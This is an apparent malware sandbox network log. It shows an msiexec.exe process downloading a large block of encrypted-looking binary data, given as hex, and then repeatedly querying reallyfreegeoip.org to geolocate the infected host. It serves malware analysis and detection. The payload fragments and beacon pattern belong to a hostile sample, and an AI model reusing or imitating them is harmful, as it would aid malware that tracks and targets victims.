X-GoogA [TRUNCATED] Access-Control-Allow-Methods: GET,HEAD,OPTIONS Accept-Ranges: bytes Content-Length: 277056 Last-Modified: Tue, 24 Dec 2024 10:08:58 GMT Date: Fri, 10 Jan 2025 16:09:12 GMT Expires: Fri, 10 Jan 2025 16:09:12 GMT Cache-Control: private, max-age=0 X-Goog-Hash: crc32c=2orCSA== Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2025-01-10 16:09:12 UTC	4936	IN	Data Raw: b7 e7 b5 22 9d 62 e2 2b 4b 90 57 d9 29 39 50 d0 cd b3 18 ec 01 ea 01 71 02 35 a4 6a 7c df f6 ce 44 54 f1 4e e5 b5 4c 4c c5 b3 6e 2e 6f 16 38 54 a9 9c 2a 0e 85 b8 65 fb df 22 38 30 7f 1c 13 09 c4 50 87 9d 42 34 56 04 7f 90 c7 02 f5 c4 dd 79 ca 96 99 4c 14 40 e2 78 0e e2 6e 28 38 65 dd 42 b4 7a 19 02 ce 2e 2a 95 97 af c0 29 0a 33 0a bb a1 8f e8 5c 49 77 0d 56 ab 05 93 eb 75 f7 44 ba eb e3 7d 95 5e 3c 95 15 65 b9 d6 cd 5d ad ef 49 84 37 b6 44 55 53 12 e3 57 81 ca 6e 32 09 8a dd 23 0b b0 56 93 41 60 54 58 59 b0 05 d1 fd 0c 11 67 11 64 90 35 a6 af d6 9d 8b 3d b2 9f 62 f3 b3 e8 c0 b7 a6 b4 1e 26 ba 57 63 9a 2f f6 71 23 17 f3 41 1a a2 22 8d d7 5e e9 0f 8b df c2 a7 bf 13 78 9c da f7 c9 88 53 fe 5a 34 b0 8c 59 24 a3 a5 99 66 70 4d ed 02 a5 ed 03 27 46 1d 72 47 1b Data Ascii: "b+KW)9Pq5j\|DTNLLn.o8Te"80PB4VyL@xn(8eBz.)3\IwVuD}^<e]I7DUSWn2#VA`TXYgd5=b&Wc/q#A"^xSZ4Y$fpM'FrG
2025-01-10 16:09:12 UTC	4827	IN	Data Raw: b8 97 54 1d 15 35 25 8c 90 9f 86 24 7e f9 e2 25 07 c3 26 fe c9 70 98 71 e0 1a cc 2e c0 07 c6 0d e0 d4 bd b3 db 42 8e b4 3d 42 e9 b2 21 94 cb 21 49 a8 4a 93 21 a1 dd 85 c7 f8 f6 cf 5b 85 1b 69 b1 43 70 9d 8b a8 ba 0d f0 12 6c 4f d8 7f 06 8a 38 9a d7 01 fa b3 13 18 af 13 78 3b b8 25 51 7e 79 9e 59 2d 10 70 e5 e9 8a 43 ce c1 87 2d 90 f4 a0 cc 7a b6 5f 35 f3 51 04 82 55 be bf f3 7c 49 bb d3 be c2 89 32 f2 10 42 56 15 51 84 3f 34 ac a5 29 d5 32 51 f8 da 71 36 20 bd 29 5e b5 c5 8a c6 5f bd 44 5f b0 7b a6 95 c8 0d 05 9b 0a 24 d0 28 9b 26 77 08 16 73 db 42 5f 75 31 53 c7 32 a5 e6 54 4f 87 0a 06 9b 6d 3c 47 02 14 91 c7 02 00 3b 01 68 76 f9 f4 4c 14 4a ef a6 40 e2 7f 2d 14 6d cc 47 db 7b 19 02 c4 2e f6 4b 99 af d1 2d 26 3b 1b bf ce 8e e8 5c 43 77 d1 5f 83 6b 93 eb Data Ascii: T5%$~%&pq.B=B!!IJ![iCplO8x;%Q~yY-pC-z_5QU\|I2BVQ?4)2Qq6 )^_D_{$(&wsB_u1S2TOm<G;hvLJ@-mG{.K-&;\Cw_k
2025-01-10 16:09:12 UTC	1322	IN	Data Raw: 0d 26 0e f0 74 db 66 31 d6 1f 0e da 62 f0 93 2f 5e 84 2e 28 d9 5c 98 9a c8 c8 2a 88 4d f4 15 72 7c b8 3a 18 b8 27 1f 2e 6a 2a 99 a5 61 5c e9 e4 58 3d 41 7e 4e 25 6c 99 b4 a5 c6 b8 59 34 4c b7 e4 79 7f 6f 52 df f3 88 74 e7 49 70 ab ca 09 43 d2 63 4d 3d e9 ef 15 f8 d9 fb 1e 7a ce 2c 03 cf 84 99 96 e0 a7 09 89 fd 3c ea 46 c1 06 7f c8 02 65 29 20 d5 30 75 09 95 2b 80 6e 66 1a d9 58 67 56 fb 3e 92 64 b6 a8 6d 9c c1 f9 d4 66 e1 b5 49 f9 4a d2 72 c0 e6 a1 40 24 c9 d5 c0 16 51 fc 6b aa 55 14 fd cf 34 80 1b 3b 44 85 4f 35 ea 8f 91 91 11 e1 b7 8a 09 ce 50 c0 45 d3 a8 1b e7 95 5a a3 fb 0e d3 db 6d 92 22 88 6c cb 30 3f 7a b4 71 da 37 0f 2f 89 8f 26 d6 7a fd f7 b0 0d f1 cf 2a e3 58 eb e5 33 d4 79 16 f9 ae 3c a1 eb 8a 51 9d 70 9d 8a 17 15 61 19 8c d1 d7 f5 ed 7c f9 e8 Data Ascii: &tf1b/^.(\Mr\|:'.ja\X=A~N%lY4LyoRtIpCcM=z,<Fe) 0u+nfXgV>dmfIJr@$QkU4;DO5PEZm"l0?zq7/&z*X3y<Qpa\|
2025-01-10 16:09:12 UTC	1390	IN	Data Raw: 69 c2 f5 92 ad 5d bb 85 8a c7 24 aa eb 41 8a 83 e0 b5 36 3a 04 67 41 57 a9 f3 95 1f 23 7f a4 f4 a8 db 4c cc a8 db e9 1f 19 5c 65 09 ca 7f fb 42 7c 38 2c 96 23 35 be eb 81 c4 db b4 35 8c 17 b9 16 bb 05 8b 38 82 d5 6a ed 39 45 a6 d6 f4 f0 a6 d4 d3 40 ba 83 7f 49 83 09 39 2e 48 ab b1 4f 3c a3 1e de c9 82 26 19 18 4d 96 ae ab 4e 9d ca 0b 0f de 82 33 be 50 ed 6f f2 78 93 f6 dc b2 b9 2b 3a 9e 32 e9 7f 8d f7 7f a8 27 c9 33 cf 1b 94 dc 03 75 a7 15 f5 d2 41 06 29 87 42 33 4b c3 43 78 86 9b 96 af 2e 71 28 b4 46 86 13 63 ee 68 54 d7 59 b5 3a 2a 3b d8 64 06 9f 32 98 d4 fc 48 41 16 e1 97 dc 2e b4 96 c1 11 d3 5a 59 71 b2 8d 0e 48 60 28 5b 51 c3 09 ed 33 f5 fc f0 f1 b6 0e c4 76 ea 9e e0 06 4a 8c 9e 16 48 92 6b 4d 65 36 a1 05 e5 cc c8 57 f8 ce 03 70 8c 07 d7 a3 c0 4f 69 Data Ascii: i]$A6:gAW#L\eB\|8,#558j9E@I9.HO<&MN3Pox+:2'3uA)B3KCx.q(FchTY:*;d2HA.ZYqH`([Q3vJHkMe6WpOi
2025-01-10 16:09:12 UTC	1390	IN	Data Raw: 3c 15 ea 37 94 0d 11 9f 8e fc a0 ae ae 0a e9 2c 36 aa 70 b5 0d 83 d9 76 18 15 fe 50 73 47 09 18 2c dc 3e 3f 54 8a 67 82 60 e9 ae 25 1f de 66 46 13 07 58 e1 b9 62 e9 e7 d0 c3 e9 b7 ab d1 6c a8 9b e1 04 20 f1 98 07 4a 29 10 a5 15 ef c3 02 04 95 1e 89 45 97 d1 ca 99 bb 4b a8 a7 f6 75 9a a9 2b 8c 2f 67 91 34 f7 5e 44 7d df 2b 14 3b e6 5d 71 64 2b aa 69 d6 04 34 8d 11 df 45 0d d5 50 69 2d 8d c3 6e 0e 70 60 ad 43 16 46 d4 3d f2 44 ef a6 5c 3f d2 21 ff 2d 66 6e 90 2c 3a 09 36 03 26 ea 2e c0 22 b4 3d 71 7e 53 32 3c c8 b6 e1 24 52 82 1c 4a a0 c0 d2 be e1 72 f6 02 ff 34 60 2b ec 04 b9 b1 85 5d d1 22 f2 67 61 41 2d b6 25 29 c0 bb 3e a2 67 5f 7d 6b 75 76 ee e2 d3 d1 b5 6f 72 34 b4 44 b5 15 91 05 41 be 2e ae 86 ac 9b 12 8e 40 08 05 c8 64 68 f1 d8 86 6f 54 fa 36 c3 4a Data Ascii: <7,6pvPsG,>?Tg`%fFXbl J)EKu+/g4^D}+;]qd+i4EPi-np`CF=D\?!-fn,:6&."=q~S2<$RJr4`+]"gaA-%)>g_}kuvor4DA.@dhoT6J
2025-01-10 16:09:12 UTC	1390	IN	Data Raw: 9a 28 f5 51 97 d9 2e 78 cd 74 53 f2 b5 a7 8c 38 53 86 dc 4c 39 bb ed f3 b9 db 28 81 c3 52 0c a4 83 ab 16 b6 7b e8 7d 28 73 b2 c9 c3 37 ee 0e 48 df 42 47 e4 95 41 76 65 35 a2 e6 67 db 9a e6 94 ec 8c 48 16 6a 70 99 a3 0a 57 d6 b2 50 0d 1c f6 2a 29 7a 0a 3a 43 f9 76 24 93 4f 98 65 97 a2 2e b4 b5 69 30 56 5c 5a 3f 1b bf 09 37 86 66 83 74 b7 eb d8 f2 ab ac fe 3e 53 64 3f e1 c8 0c 4a fe 24 c3 b0 7a d2 47 f7 c5 6b 9a d8 41 8b cf fb 5b 47 6d 3f 47 d1 ed 48 67 09 d9 d2 de 47 fe 2c 47 7a 4e aa c0 16 09 a9 ce dc 5a 7b c3 1e d5 7f b4 21 50 2e 5a 44 b6 40 1a 79 e0 d9 3a d6 2d ff d3 7f 2c 90 4e af 7a b2 82 1b 2a b3 8d 6a 75 d7 62 ea f8 2e 47 96 b8 bf 20 d5 04 ae c0 65 17 28 81 75 0b 71 ac 27 7e a6 d9 49 24 72 6d 9f a4 ec ab 75 1a 61 4d 9d 68 f7 99 a7 c2 0d 14 ea f0 b8 Data Ascii: (Q.xtS8SL9(R{}(s7HBGAve5gHjpWP)z:Cv$Oe.i0V\Z?7ft>Sd?J$zGkA[Gm?GHgG,GzNZ{!P.ZD@y:-,Nzjub.G e(uq'~I$rmuaMh
2025-01-10 16:09:12 UTC	1390	IN	Data Raw: 44 60 2f 2d b7 5d de ec 54 9b 9a 17 06 81 2e 9f 56 04 71 90 d6 18 65 91 dd 79 78 96 88 57 7b 9b e2 78 44 e2 6e 10 fb 65 dd 42 b4 7a 0f 2a b8 2e 2a 9f 97 8f c0 25 0a 33 22 cc a1 8f e2 5c 55 fa 4d 56 ab 04 b6 fd 87 51 4f ba 95 d4 86 9b 5e 8e 3e fd 53 7f 92 81 90 88 19 04 f5 36 7d 25 27 4c 5d d1 36 ec ec af 76 7e 9a f4 57 2b d6 91 96 29 67 2d 6a 30 ae 87 b0 a9 44 bc 4a 7e 00 f4 3e bd d0 45 a9 8b 4d 10 ba 75 db 07 b8 85 bd 04 dd 07 57 2b 9b e6 7a eb d3 68 0b a3 f3 41 10 00 e7 97 a7 2c f0 0e ab 7d ea f6 bb 13 72 2a f2 82 c9 88 59 ed 3a 05 6d 99 59 74 dd ba 99 06 70 65 a4 02 e5 e7 71 c0 54 1d 02 6d 59 07 1f a9 ab 3a 94 74 e8 e5 ff f6 6e 92 38 d4 1f 53 76 5e 57 7b c8 f5 92 1f 9f 61 9a 14 8e a2 02 44 96 d6 fb 09 ed f8 d0 c4 62 11 34 58 da f0 6c 24 11 e6 ee 12 90 Data Ascii: D`/-]T.VqeyxW{xDneBz.%3"\UMVQO^>S6}%'L]6v~W+)g-j0DJ~>EMuW+zhA,}r*Y:mYtpeqTmY:tn8Sv^W{aDb4Xl$
2025-01-10 16:09:12 UTC	1390	IN	Data Raw: 3d a2 5f 94 9e ec 59 bc a8 b7 ff 07 f0 f8 6b e8 cb 40 8b d3 c8 72 6c 10 06 65 0c f7 a7 6f 0c 42 88 43 d9 37 14 f7 aa 2e e3 1d 31 44 94 47 28 19 fd 91 91 14 b6 34 fa 44 b1 46 98 66 f6 bf 39 45 6b 5b ba 5c 3a ce 90 c0 9f 22 f8 b0 c1 29 41 46 c6 02 ce 95 5a 23 d3 85 29 d6 00 49 2c aa 60 dd de 2c de ca cf f9 41 4d 62 e8 8f 31 14 d4 ed f9 9b f2 b8 97 a2 dc 15 1f 2f 8c a2 11 86 24 76 ea e5 34 5a bd 1c fe fe 75 eb b2 71 1b c6 41 0a 07 c6 07 e0 c5 ba dc 1c 42 8e be ee 7e e9 b2 3e fb 0d 21 81 a3 4a 82 28 d3 44 95 c7 88 de 7b 5b 85 11 1b 1f 53 70 ed 74 f2 ba 0d 22 7c ab 4f c8 75 06 9b 7a 87 5a 40 e1 83 11 3d 08 61 43 2d ab 55 f3 4a 6e b6 c5 4e 10 7a 4d c7 95 19 f3 ce 87 57 31 be e5 b2 42 bc 30 55 51 74 14 f0 63 a2 af 0e 81 6c a0 ac f1 a7 89 36 5a 35 59 23 3d 21 84 Data Ascii: =_Yk@rleoBC7.1DG(4DFf9Ek[\:")AFZ#)I,`,AMb1/$v4ZuqAB~>!J(D{[Spt"\|OuzZ@=aC-UJnNzMW1B0UQtcl6Z5Y#=!
2025-01-10 16:09:12 UTC	1390	IN	Data Raw: c5 5a 9f b5 c1 3d 13 7f 43 09 5d 8e 0e 38 c2 73 77 2f e3 0d 9f a2 55 d9 9c 95 d9 99 c4 06 42 a0 6b 07 59 a2 e0 6e 64 ce 7c d3 07 2d 2c 44 c0 da bb 3f e1 bc 2a c5 a9 60 5d 32 d7 67 d7 47 5b 40 de 26 ae cb ad 17 eb b2 5b 69 f9 48 32 db 36 1f 6b 5a c6 29 f3 c5 90 2f f0 d8 fb 74 72 b3 81 40 2d eb 75 d8 15 03 16 b7 c5 86 10 6e 59 ce 8d b8 c8 70 7b 03 74 30 ec a8 d3 bf ec 5a 58 fc 83 45 70 e3 df c7 c7 12 49 8c b9 2e 1e 9a e6 5c e4 b3 e6 1c 81 27 2c b4 b1 09 4a 73 bb ad ec 76 5f c3 89 08 fc e4 7b 0c e8 48 45 4a ef b7 ec d3 35 2f aa d5 d9 66 4b d3 32 8f f2 00 fa 85 db 82 c9 0d 39 fc 70 c4 87 3b ba 2a 88 48 a3 96 02 47 de 2c 40 9b 02 08 0c c8 d4 98 bc c5 68 f7 af fc 30 41 0e 92 2f 75 e7 88 d7 b5 ac fb 61 40 ed 54 7a 7f 15 e6 04 e9 e5 53 f6 4e 4d 39 ee 15 31 95 61 Data Ascii: Z=C]8sw/UBkYnd\|-,D?`]2gG[@&[iH26kZ)/tr@-unYp{t0ZXEpI.\',Jsv_{HEJ5/fK29p;HG,@h0A/ua@TzSNM91a
2025-01-10 16:09:12 UTC	1390	IN	Data Raw: 46 87 5d ab ea da e6 61 41 59 95 db 28 d7 db ba b2 4b 23 7a 52 e3 19 24 e8 c5 25 b4 7c 52 2e bf 6c 6f 02 fe cf 3f 95 24 ae 82 95 61 6c b0 4a 1b 0d 9e 99 68 f1 d6 9b 92 45 fa 4c d5 73 90 ff 2c 02 d0 7e 9b 41 34 33 8d f6 75 6f 32 1f 0d 74 e5 b6 3c b8 6b 77 4c b9 a8 8b 28 67 10 76 e5 93 23 80 2b 53 ac b6 81 7c 7a e7 5d c2 dd c2 be 4e b1 b0 65 87 24 a0 34 64 9c f1 ad ba 36 34 93 42 56 7b 6f 66 97 15 f1 4c 94 07 cf d4 46 aa f4 ff e3 75 30 48 5c f6 69 5a e1 2d 7a 77 2c e6 80 35 b3 e7 90 d2 db c0 35 8c 1c e3 3b b4 05 f1 38 8f b8 18 8a 3c 2a 8a 74 d1 e3 cb cd c8 cd fe 21 5a 52 d4 2e 48 dd 2a 09 e4 f6 67 94 36 6a cd 20 09 a7 4f 12 f2 c9 d4 ec c5 1d 2e 16 aa a9 26 c0 62 4f 4a ec 78 93 e4 dc b2 0d 2b ce 9e 32 e9 7a 51 e0 44 c8 36 df 00 19 3b 94 d0 15 5d f9 62 f5 d8 Data Ascii: F]aAY(K#zR$%\|R.lo?$alJhELs,~A43uo2t<kwL(gv#+S\|z]Ne$4d64BV{ofLFu0H\iZ-zw,55;8<t!ZR.Hg6j O.&bOJx+2zQD6;]b

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.11	49984	104.21.80.1	443	1480	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 16:09:15 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-10 16:09:16 UTC	863	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 16:09:15 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1840145 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jxyCKTnuQBc6q0A11e5XA76ndYCAtAKhWTj%2B89IuI8vDVlFwz%2BRrx%2BxvW%2B1FudIAwXxyjJ1Clj%2BAWFgVfvOtK1lmGB%2BuQhVFkWymJOTPn5vuUnlmvC9gQE%2FxyIdT57NePeiiMEP4"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ffdee32ab088c0f-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1968&min_rtt=1948&rtt_var=772&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2846&recv_bytes=699&delivery_rate=1381267&cwnd=223&unsent_bytes=0&cid=e48628c95ae1ac80&ts=162&x=0"
2025-01-10 16:09:16 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.11	49985	104.21.80.1	443	1480	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 16:09:16 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-01-10 16:09:16 UTC	863	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 16:09:16 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1840146 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=R2GD42HPcHa%2FdKkbf8u9oiS3ubhyQzeelPMxEnPryzQcAmOX%2Fx7sp4xD9ajZ0PZqVvqTSZfzvmS11b%2FF7Irr4dURGqD0iWNeb02QyJh583KH%2BerhE6d2VBW5Wl%2BELe6%2FexUwzRW%2B"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ffdee38abd28c0f-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2119&min_rtt=2111&rtt_var=798&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1383230&cwnd=223&unsent_bytes=0&cid=548b7ffaf55e6dc8&ts=155&x=0"
2025-01-10 16:09:16 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.11	49987	104.21.80.1	443	1480	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 16:09:18 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-10 16:09:18 UTC	865	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 16:09:18 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1840147 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=thytGCIvrftgSPLdnpGxD95H83k71mrGZdNK%2BIpeYr34OI92nxMzmIqq6fmjgo8T%2FlcC%2FKpjLWcJGEv9lz8a4s%2FmCN%2BijTyi1cnOedF9wURYIAyRp0fy%2FKd3OClbasL1%2BniR%2BBab"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ffdee4029c9c443-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1700&min_rtt=1686&rtt_var=661&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1619523&cwnd=244&unsent_bytes=0&cid=3e08b7cf2c15a720&ts=151&x=0"
2025-01-10 16:09:18 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.11	49989	104.21.80.1	443	1480	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 16:09:19 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-10 16:09:19 UTC	861	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 16:09:19 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1840148 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=l%2Bm8l84QfWaToII43ZbKPh8Edr4dFMJDUzcUgCn51v%2BB76cwf40TLXLkbosTLu16GBHw5zTazK1VNH%2BSybNivlmDoA2r3Svy%2FIthV6s2mUlnqciXO1KIrFot%2FXyNAt1sube0ze%2BE"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ffdee47fdd9c443-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1687&min_rtt=1661&rtt_var=675&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1559829&cwnd=244&unsent_bytes=0&cid=e520081a7a612ab7&ts=150&x=0"
2025-01-10 16:09:19 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.11	49991	104.21.80.1	443	1480	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 16:09:21 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-10 16:09:21 UTC	855	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 16:09:21 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1840150 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5fiiaAyXZHYfDn3YVJV%2FV8haogVEHQvM5u%2BYsm93bUabFXUxHBVTIiQNUWT5cpKa3jHEyfu9ekTDl3seSRAKzZQSRAPmgI8THIyNS1luV3C8Imy7pz%2BZ91d11njVMzffOtl33q6B"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ffdee5539c443ee-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1604&min_rtt=1595&rtt_var=617&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1745367&cwnd=228&unsent_bytes=0&cid=a86b7d72e1aac283&ts=167&x=0"
